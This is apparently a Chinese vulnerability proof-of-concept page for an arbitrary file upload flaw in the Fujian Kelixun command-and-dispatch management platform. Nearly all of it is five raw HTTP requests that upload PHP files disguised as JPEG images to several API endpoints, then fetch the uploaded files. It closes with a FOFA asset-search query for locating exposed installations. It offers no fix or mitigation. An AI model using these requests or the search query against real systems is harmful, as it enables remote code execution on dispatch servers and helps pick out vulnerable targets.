影响范围
福建科立讯通信指挥调度管理平台
漏洞概述
福建科立讯通信指挥调度管理平台任意文件上传
漏洞复现
应用界面如下:
漏洞POC1:
代码语言:javascript复制POST /api/client/fileupload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 477
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="file"; filename="rcnlsq.php"
Content-Type: image/jpeg
5465rcnlsq
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="number";
5465
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="type";
1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="title";
1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M-- 利用方式2:
代码语言:javascript复制POST /api/client/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
Content-Type: image/jpeg
99647lztkkl
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
GET /upload/lztkkl.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
利用方式3:
代码语言:javascript复制POST /api/client/task/uploadfile.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"
Content-Type: image/jpeg
97236rvfuid
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
文件路径:响应包获取利用方式4:
代码语言:javascript复制POST /api/client/event/uploadfile.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"
Content-Type: image/jpeg
48620iuctmt
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
文件地址:响应包获取利用方式5:
代码语言:javascript复制POST /api/client/upload.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 200
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"
Content-Type: image/jpeg
dzfuxvtm186448
------WebKitFormBoundarymVk33liI64J7GQaK--
GET /upload/dzfuxvtm.php HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close 资产测绘
FOFA检索:
代码语言:javascript复制body="指挥调度管理平台" && title=="指挥调度管理平台"
